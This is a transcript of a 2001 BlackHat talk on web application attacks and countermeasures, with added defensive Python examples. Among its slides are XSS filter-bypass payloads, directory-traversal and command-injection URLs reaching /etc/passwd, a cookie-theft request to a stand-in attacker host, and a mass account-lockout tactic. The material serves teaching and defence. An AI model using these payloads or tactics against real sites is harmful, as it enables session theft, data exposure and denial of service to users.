
Web Application Security: The Land that Information Security Forgot


Today, the vast majority of those within information security have heard about web application security and possess at least a vague understanding of the risks involved. However, the multitude of attacks which make this area of security important, for the most part, go undocumented, unexplained and misunderstood. As a result, our web applications remain undefended and at the mercy of a determined attacker. In order to gain a deeper understanding of the threats, witnessing these attacks first hand is essential.

Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security".

This discussion will cover theory surrounding some of the more dangerous web application attacks, examples of the attacks in action, and possible countermeasures.

Jeremiah Grossman is founder and chairman of WhiteHat Security, and former information security officer with Yahoo!. As information security officer at Yahoo!, Jeremiah designed, audited, and penetration-tested the huge company's web applications, which demand the highest security. During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on the prevention of web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions such as Defcon, the Air Force and Technology Conference, ToorCon, and others. Jeremiah is a lead contributor to the "Open Web Application Security Project" (www.owasp.com) and is considered to be among the foremost web security experts.

Page 1: Web Application Security: The Land that Information Security Forgot

BlackHat Amsterdam 2001

Web Application Security: The Land that Information Security Forgot.

Presenter: Jeremiah Grossman

Copyright 2001 WhiteHat Security All Rights Reserved

Page 2: Web Application Security: The Land that Information Security Forgot

Topics

Web Application Security Landscape

Common Web Application Security Mistakes

Web Application Attack Methodologies

2001 © WhiteHat Security, Inc.

Page 3: Web Application Security: The Land that Information Security Forgot

Topics

Web Application Attack Methodologies

Information & Discovery

Input Manipulation & Parameter Tampering

Cross-Site Scripting

System Mis-Configuration


Page 4: Web Application Security: The Land that Information Security Forgot

But Why!?

• Easiest way to compromise hosts, networks and users.
• Widely deployed.
• No Logs! (POST Request payload)
• Incredibly hard to defend against or detect.
• Most don't think of locking down web applications.
• Intrusion Detection is a joke.
• Firewall? What firewall? I don't see no any firewall.
• Encrypted transport layer does nothing.
• Best of all, no one is looking anyway.


Page 5: Web Application Security: The Land that Information Security Forgot

How much easier can it get!?

Oh right.

Unicode


Page 6: Web Application Security: The Land that Information Security Forgot

Web Application: The Simple Definition

A web application or web service is a software application that is accessible using a web browser or HTTP(s) user agent.


Page 7: Web Application Security: The Land that Information Security Forgot

Web Security Layers


Page 8: Web Application Security: The Land that Information Security Forgot

The Implementation

Entertainment: Message Boards, WebMail, Guest Books, Voting Polls

E-Commerce: Shopping, Auctions, Banking, Stock Trading

Just Plain Crazy: Printers, PDA's, Cell Phones, System Configuration, .NET/Passport


Page 9: Web Application Security: The Land that Information Security Forgot

Firewall


Page 10: Web Application Security: The Land that Information Security Forgot


Page 11: Web Application Security: The Land that Information Security Forgot

Common Web Application Security Mistakes


Page 12: Web Application Security: The Land that Information Security Forgot

Trusting Client-Side Data

DO NOT TRUST CLIENT-SIDE DATA!

Trusting Client-Side Data is the #1 cause of vulnerabilities.

Identify all input parameters that trust client-side data.


Page 13: Web Application Security: The Land that Information Security Forgot

Trusting Client-Side Data

The Level of Trust: E-Commerce Shopping

Numbers

<input type=hidden value=2149.37>  2149.00  Too much for a new VAIO!

<input type=hidden value=2.99>  2.99  Now On Sale!
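The hidden-price form above, handled both ways in Python as an added example (not code from the slides): the naive handler multiplies whatever price the hidden field carries, the hardened one takes the price from a server-side catalog and treats a mismatch as a tampering signal. The catalog, item names and form field names are constructed for the example.

```python
from urllib.parse import parse_qs

# Constructed catalog: the only source of truth for prices on the server.
CATALOG = {"vaio": 2149.37, "mousepad": 2.99}


def total_trusting_client(body: str) -> float:
    """The slide's mistake: the price is read back from the hidden form field.

    Anyone can edit <input type=hidden value=2149.37> to 2.99 before submitting.
    """
    form = parse_qs(body)
    return round(float(form["price"][0]) * int(form["qty"][0]), 2)


def total_from_catalog(body: str) -> float:
    """Hardened: the client may choose an item and a quantity, never a price."""
    form = parse_qs(body)
    item = form.get("item", [""])[0]
    qty = int(form.get("qty", ["0"])[0])
    if item not in CATALOG or qty < 1:
        raise ValueError("unknown item or invalid quantity")
    server_price = CATALOG[item]
    client_price = form.get("price", [None])[0]
    # If the form still carries a price, a mismatch is worth logging as tampering;
    # either way only the server-side value is billed.
    if client_price is not None and float(client_price) != server_price:
        raise ValueError(
            f"price tampering: client sent {client_price}, catalog says {server_price}"
        )
    return round(server_price * qty, 2)
```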


Page 14: Web Application Security: The Land that Information Security Forgot

Trusting Client-Side Data

The Level of Trust: Searches/Queries/Templates

Path
http://foo.com/cgi?val=string&file=/html/name.db

Or better yet…

http://www.foo.com/cgi?string=root&file=../../../../../etc/passwd


Page 15: Web Application Security: The Land that Information Security Forgot

Unescaped Special Characters

! @ $ % ^ & * ( ) -_ + ` ~ \ | [ ] { } ; : ' " ? / , . > <

Check for: Unescaped special characters within input strings


Page 16: Web Application Security: The Land that Information Security Forgot

HTML Character Filtering

Proper handling of special characters

> => &gt;
< => &lt;
" => &quot;
& => &amp;

Null characters should all be removed. %00


Page 17: Web Application Security: The Land that Information Security Forgot

More mistakes…

SUID (Does a web application really need root?)

Authentication mechanisms using technologies such as JavaScript or ActiveX.

Lack of re-authenticating the user before issuing new passwords or performing critical tasks.

Hosting of uncontrolled data on a protected domain.


Page 18: Web Application Security: The Land that Information Security Forgot

Information & Discovery

Spidering/Site Crawling

Identifiable Characteristics

Errors and Response Codes

File/Application Enumeration

Network Reconnaissance


Page 19: Web Application Security: The Land that Information Security Forgot

Spidering/Site Crawling

Site Map

Service Map

Documentation

Hidden Services

CGI's and Forms

Email addresses

Tools: WGET http://www.gnu.org/software/wget/wget.html


Page 20: Web Application Security: The Land that Information Security Forgot

Identifiable Characteristics

Comment Lines

URL Extensions

Meta Tags

Cookies

Client-Side scripting languages

Enormous wealth of information about process flows, debug commands, system types and configurations.


Page 21: Web Application Security: The Land that Information Security Forgot

Error and Response Codes

HTTP Response Headers
Server: IBM/Apache 1.3.19

Cookie Characteristics

Error Messages
Exception Messages (Java / SQL)
404 Error Pages
Failed Login
Locked Account
Database or file non-existent


Page 22: Web Application Security: The Land that Information Security Forgot

File/Application Enumeration

Commonly referred to as “forced browsing” or “CGI Scanning”.

Directory Browsing / Index Listings

http://www.foo.com/dir3/dir2/dir1/file.html

Try:

http://www.foo.com/dir3/dir2/dir1/

http://www.foo.com/dir3/dir2/

http://www.foo.com/dir3/

Tools: Whisker

http://www.wiretrip.net/


Page 23: Web Application Security: The Land that Information Security Forgot

File/Application Enumeration

Sample Files

Template Directories

Temp or Backup files

Hidden Files

Vulnerable CGIs


Page 24: Web Application Security: The Land that Information Security Forgot

Network Reconnaissance

WHOIS

ARIN http://www.arin.net/whois/index.html

Port Scan (Nmap) http://www.insecure.org/nmap/index.html

Traceroute

Ping Scan (Nmap or HPING) http://www.hping.org/

NSLookup/ Reverse DNS

DNS Zone Transfer (DIG)

OS Finger Printing (Nmap or Xprobe)


Page 25: Web Application Security: The Land that Information Security Forgot

Input Manipulation / Parameter Tampering: "Twiddling Bits."

Cross-Site Scripting

Filter-Bypass Manipulation

OS Commands

Meta Characters

Path/Directory Traversal

Hidden Form Field Manipulation

HTTP Headers


Page 26: Web Application Security: The Land that Information Security Forgot

Cross-Site Scripting: a bad name given to a dangerous security issue.

The attack targets the user of the system rather than the system itself.

Outside client-side languages executing within the user's web environment with the same level of privilege as the hosted site.


Page 27: Web Application Security: The Land that Information Security Forgot

Client-Side Scripting Languages

DHTML (HTML, XHTML, HTML x.0): Opens all the doors.

JavaScript (1.x): Browser/DOM Manipulation

Java (Applets): Malicious Applets

VBScript: Browser/DOM Manipulation

Flash: Dangerous Third-Party Interactivity

ActiveX: Let me count the ways…

XML/XSL: Another Door Opener

CSS: Browser/DOM Manipulation


Page 28: Web Application Security: The Land that Information Security Forgot

Accessing the DOM & Outside the DOM

Document Object Model (DOM)

Client-Side languages possess an enormous amount of power to access and manipulate the DOM within a browser.

Complex & diverse interconnections create an increased level of access within the DOM.

Increased level of access to read & modify DOM data, ranging from background colors, to a file on your system, and beyond to executing system calls.


Page 29: Web Application Security: The Land that Information Security Forgot

Authentication/Authorization “Hand in the cookie jar.”

Cookies are restricted to domains (.acme.com). Uncontrolled data on a restricted domain can access the cookie data.

JavaScript Expression: "document.cookie"
window.open
document.img.src
Hidden Form Submit

www.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATA

Cookie data is passed to a CGI through a GET request to an off-domain host.


Page 30: Web Application Security: The Land that Information Security Forgot

The Scenarios

Trick a user to re-login to a spoofed page

Compromise authentication credentials

Load dangerous or malicious ActiveX

Re-Direct a user or ALL users

Crash the machine or the browser


Page 31: Web Application Security: The Land that Information Security Forgot

CSS Danger: "The Remote Launch Pad."

Successfully CSS a user via a protected domain.

Utilizing a Client-Side utility (JavaScript, ActiveX, VBScript, etc.), exploit a browser hole to download a trojan/virus.

User is unknowingly infected/compromised within a single HTTP page load.

ActiveX Netcat Anyone?


Page 32: Web Application Security: The Land that Information Security Forgot

Dangerous HTML: "HTML Bad"

<APPLET> Malicious Java Applications
<BODY> Altering HTML Page Characteristics
<EMBED> Embedding Third-Party Applications (Flash, etc.)
<FRAME> Directly calling in other uncontrolled HTML
<FRAMESET> Directly calling in other uncontrolled HTML
<HTML> Altering HTML Page Characteristics
<IFRAME> Directly calling in other uncontrolled HTML
<IMG> SRCing Protocol attacks and other abuses
<LAYER> Directly calling in other uncontrolled HTML
<ILAYER> Directly calling in other uncontrolled HTML
<META> META Refreshes (Client-Redirects)
<OBJECT> ActiveX (Nuff Said)
<SCRIPT> JavaScript/VBScript Loading
<STYLE> Style Sheet and Scripting Alterations


Page 33: Web Application Security: The Land that Information Security Forgot

Dangerous Attributes: "Attributes Bad"

ATTRIBUTE DANGER LIST (Any HTML Tag that has these attributes)

STYLE
SRC
HREF
TYPE


Page 34: Web Application Security: The Land that Information Security Forgot

Filter Bypassing: "JavaScript is a Cockroach"

There are all kinds of input filters web applications implement to sanitize data.

This section will demonstrate many known ways input filters can be bypassed to perform malicious functions such as cross-site scripting, browser-hijacking, cookie theft, and others.

Client-Side Scripting (CSS) attacks require the execution of either JavaScript, Java, VBScript, ActiveX, Flash or some others.

We will be assuming that these web applications accept HTML, at least in a limited sense.


Page 35: Web Application Security: The Land that Information Security Forgot

Testing the Filters

Submit all the raw HTML tags you can find, and then view the output results.

Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler).

This will show what HTML is allowed, what the changes were, and possibly what dangerous HTML can be exploited.


Page 36: Web Application Security: The Land that Information Security Forgot

SCRIPT TAG

Description: The script tag is the simplest form of inputting JavaScript.

Exploit: <SCRIPT>alert('JavaScript Executed');</SCRIPT>

Solution: replace all "script" tags.


Page 37: Web Application Security: The Land that Information Security Forgot

SRCing JavaScript Protocol

Description: The JavaScript protocol will execute the expression entered after the colon. Netscape tested.

Exploit: <IMG SRC="javascript:alert('JavaScript Executed');">

Solution: Replace "javascript" strings in all SRC & HREF attributes in HTML tags with another string.

Exp: <IMG SRC="java_script:alert('JavaScript Executed');"> will render this script useless.

Further Information: Any HTML tag with a SRC attribute will execute this script on page load or on link activation.

As further protocol pattern matching, the keywords "livescript" and "mocha" must also be replaced, for they hold the same possibilities.

*** Netscape code names ***

Page 38: Web Application Security: The Land that Information Security Forgot

SRCing JavaScript Protocol w/ HTML Entities

Description: As another derivative of the previous, decimal HTML entities within these strings can cause filter bypass.

Exploit: <IMG SRC="javasc&#09;ript:alert('JavaScript Executed');">
Replacement of entities \10 - \11 - \12 - \13 will also succeed.

Hex instead of decimal HTML entities will also bypass input filters and execute.

<IMG SRC="javasc&#X0A;ript:alert('JavaScript Executed');">

As well as placing multiple ZEROs in front.
<IMG SRC=javasc&#000010;ript:alert('JavaScript Executed');>

Solution: Filter these entities within the string, then do your further pattern matching.


Page 39: Web Application Security: The Land that Information Security Forgot

AND CURLY

Description: Obscure Netscape JavaScript execution line. Exact syntax is needed to execute.

Exploit: <IMG SRC="&{alert('JavaScript Executed')};">

Solution: <IMG SRC="XXalert('JavaScript Executed')};"> or something similar will nullify the problem.


Page 40: Web Application Security: The Land that Information Security Forgot

Style Tag Conversion

Description: Turn a style tag into a JavaScript expression.

Exploit: <style TYPE="text/javascript">JS EXPRESSION</style>

Solution: Replace the "javascript" string with "java_script" and all should be fine.

Exploit: Import dangerous CSS.
<STYLE type=text/css>@import url(http://server/very_bad.css);</STYLE>

Solution: Filter and replace the "@import".

Exploit: Import a JavaScript Expression through a style tag.
<style TYPE="text/css">@import url(javascript:alert('JavaScript Executed')); IE HOLE</style>

Solution: Again, filter and replace the "@import" and the "javascript:" just to be safe.
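An added example (not code from the slides) that normalizes a value the way slides 37 to 40 require before checking it: numeric entities (decimal, hex, leading zeros, with or without the semicolon) are decoded, the control characters that entities 9 to 13 produce are dropped, case is folded, and only then is the value compared against the javascript:, livescript: and mocha: schemes and the &{...} form; a companion check covers @import in style content. Function names are mine.

```python
import re

# Schemes the slides name: javascript plus Netscape's livescript and mocha aliases.
SCRIPT_SCHEMES = ("javascript:", "livescript:", "mocha:")

# &#9; &#09; &#X0A; &#000010; ... the trailing ';' is optional, as browsers allow.
_NUMERIC_ENTITY = re.compile(r"&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?")
# Tab, LF, VT, FF, CR and the other C0 controls: browsers ignore them inside a scheme.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def decode_numeric_entities(value: str) -> str:
    """Resolve decimal and hex character references, whatever the zero padding."""
    def to_char(match: re.Match) -> str:
        hex_digits, dec_digits = match.groups()
        code = int(hex_digits, 16) if hex_digits is not None else int(dec_digits)
        return chr(code) if code <= 0x10FFFF else "\ufffd"
    return _NUMERIC_ENTITY.sub(to_char, value)


def normalize(value: str) -> str:
    """Reduce a value to what a lenient browser acts on: decoded, controls removed, lower-cased."""
    return _CONTROL_CHARS.sub("", decode_numeric_entities(value)).strip().lower()


def attribute_url_is_safe(value: str) -> bool:
    """Check a SRC/HREF value after normalization, so entity and whitespace tricks cannot hide the scheme."""
    normalized = normalize(value)
    if normalized.startswith(SCRIPT_SCHEMES):
        return False
    if normalized.startswith("&{"):  # slide 39: Netscape's &{expression}; form
        return False
    return True


def style_content_is_safe(css: str) -> bool:
    """Check STYLE content for @import and for a script scheme anywhere inside it (slide 40)."""
    normalized = normalize(css)
    if "@import" in normalized:
        return False
    return not any(scheme in normalized for scheme in SCRIPT_SCHEMES)
```

The page's own suggested fix (rewriting "javascript" to "java_script") passes this check, because the normalized value then starts with no script scheme.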

Page 41: Web Application Security: The Land that Information Security Forgot

Using CSS

Click to Execute: User must click on a link to execute the script. (Search Fields, 404 Errors, etc.)

http://www.foo.com/NOFILE/<SCRIPT>alert('JavaScript Launched');</SCRIPT>

Mass Injection: All users viewing the page execute the script. (Guest Books, Message Boards)

Post a JavaScript onto a board:

Message <SCRIPT>alert('JavaScript Launched');</SCRIPT>


Page 42: Web Application Security: The Land that Information Security Forgot

Using CSS

Directed Injection: As soon as a user loads the page, the script executes. (WebMail, HTML Mail, Messaging)

Send an email with…
HELLO <SCRIPT>alert('JavaScript Launched');</SCRIPT>

Holding the door open (FeedBack, Profile Pages, anything persistent…)

Load HTML Page with sourced scripts.

<LAYER SRC="javascript.js"></LAYER>


Page 43: Web Application Security: The Land that Information Security Forgot

Twiddling Bits

OS Commands

Meta Characters

Path/Directory Traversal


Page 44: Web Application Security: The Land that Information Security Forgot

Power of the Semi-Colon: piping input to the command line.

OS Commands
http://foo.com/[email protected]

Append:
http://foo.com/[email protected];+sendmail+/etc/passwd

Piping:
http://foo.com/[email protected]+|+less

Re-Direct:
http://foo.com/[email protected]+>+/


Page 45: Web Application Security: The Land that Information Security Forgot

Power of Special Characters: piping input to the command line.

Meta Characters
http://foo.com/app.cgi?list=file.txt

Altered:
http://foo.com/app.cgi?list=*
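An added example (not code from the slides) of the server side of slides 44 and 45 in Python: the recipient and list-file parameters are URL-decoded, checked against an allowlist that admits none of slide 15's metacharacters, and the command is built as an argument vector so a shell never interprets them. The parameter shapes, regexes, sendmail path and sample inputs are constructed; the email address used in the test is my own placeholder, since the slide's addresses are redacted.

```python
import re
from urllib.parse import unquote_plus

# Slide 15's "unescaped special characters", as a set so a rejection can report which were present.
SPECIAL_CHARS = set("!@$%^&*()-_+`~\\|[]{};:'\"?/,.><")

# Allowlists (constructed): the only shapes the two CGI parameters legitimately take.
_EMAIL = re.compile(r"[A-Za-z0-9._+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
_LIST_FILE = re.compile(r"[A-Za-z0-9_-]{1,32}\.txt")


def shell_string_the_slide_attacks(raw_param: str) -> str:
    """What a CGI that splices the decoded parameter into a shell command line actually runs."""
    return "sendmail " + unquote_plus(raw_param)


def special_chars_in(value: str) -> set:
    """Slide 15 characters present in a decoded value; for logging, not as the only check."""
    return SPECIAL_CHARS & set(value)


def recipient_argv(raw_param: str) -> list:
    """Argument vector for the mail parameter; ';', '|' and '>' never reach a shell.

    Raises ValueError unless the decoded parameter is exactly one address.
    """
    to = unquote_plus(raw_param)  # '+' and %XX decoded the way the CGI layer would
    if not _EMAIL.fullmatch(to):
        raise ValueError(f"rejected recipient {to!r}; special chars: {sorted(special_chars_in(to))}")
    return ["/usr/sbin/sendmail", to]  # hand to subprocess.run(...) without shell=True


def list_argv(raw_param: str) -> list:
    """Same for list=file.txt (slide 45): a bare '*' cannot glob when it is one argv element."""
    name = unquote_plus(raw_param)
    if not _LIST_FILE.fullmatch(name):
        raise ValueError(f"rejected list name {name!r}")
    return ["/bin/cat", "/srv/app/lists/" + name]
```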


Page 46: Web Application Security: The Land that Information Security Forgot

Power of the Dots and Slashes: piping input to the command line.

Path Directory Traversal
http://foo.com/app.cgi?directory=/path/to/data

DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/passwd

Dot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/././passwd

Double DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data....//....//....//etc/passwd

Page 47: Web Application Security: The Land that Information Security Forgot

More Filter Bypassing

Method Alteration (HEAD, PUT, POST, GET, etc.)

URL Encode

http://www.foo.com/cgi?value=%46%72%68%86

Null Characters

http://www.foo.com/cgi?value=file%00.html

More…

Alternate Case, Unicode, String Length, Multi-Slash, etc.


Page 48: Web Application Security: The Land that Information Security Forgot

More bits…

Hidden Form Field Manipulation

HTTP Headers (Cookies, Referers…)


Page 49: Web Application Security: The Land that Information Security Forgot

System Mis-Configurations: "patches, patches, and more patches…"

Vendor Patches

Default Accounts

Check:
Web Server permissions by directory browsing
Software version from Discovery
Known default accounts in commercial platforms
BugTraq
Anonymous FTP open on Web Server


Page 50: Web Application Security: The Land that Information Security Forgot

Other Dirty Tricks: "Abuse can be far more time consuming, costly and dangerous"

Mass Account Lockout: Attacks against brute force

3 Time Failure Lock-Out Rule

Purposely fail the 3 attempts against thousands of accounts. If the logins are sequential, even better.


Page 51: Web Application Security: The Land that Information Security Forgot

Other Dirty Tricks: "Abuse can be far more time consuming, costly and dangerous"

Brute Force/Page Sequencing: Attacks against process flow

Use 1 or 2 pieces of data to get the rest.

Slowly brute force the process for data aggregation.


Page 52: Web Application Security: The Land that Information Security Forgot

Thank You, BlackHat and Attendees

Questions?

Jeremiah [email protected]

WhiteHat Security
All presentation updates will be available on www.whitehatsec.com
